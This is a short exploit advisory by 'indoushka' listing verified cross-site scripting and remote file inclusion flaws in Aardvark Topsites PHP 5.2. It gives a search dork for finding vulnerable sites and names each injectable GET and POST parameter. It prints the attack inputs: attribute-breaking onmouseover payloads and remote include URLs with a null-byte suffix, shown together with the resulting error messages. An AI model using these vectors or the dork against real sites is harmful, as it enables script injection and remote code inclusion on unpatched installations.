Aardvark Topsites PHP 5.2 Multi Vulnerability ============================================= Author : indoushka Vondor : www.p30vel.ir http://www.aardvarktopsitesphp.com/ http://www.avatic.com/ Dork : My Topsites List - Powered by Aardvark Topsites PHP 5.2.1 ====================================== Cross site scripting (verified) : This vulnerability affects /rank/index.php. Attack details : URL encoded GET input q was set to 1" onmouseover=prompt(999881) bad=" The input is reflected inside a tag parameter between double quotes. URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(932713) bad=" The input is reflected inside a tag parameter between double quotes. URL encoded POST input title was set to Mr." onmouseover=prompt(903995) bad=" The input is reflected inside a tag parameter between double quotes. URL encoded POST input u was set to 1" onmouseover=prompt(986160) bad=" The input is reflected inside a tag parameter between double quotes. URL encoded POST input url was set to #" onmouseover=prompt(915056) // The input is reflected inside a tag parameter between double quotes. File inclusion : URL encoded GET input l was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg Error message found: Failed opening required '../languages/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php' URL encoded POST input sql was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg Error message found: Failed opening required '../sources/sql/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php'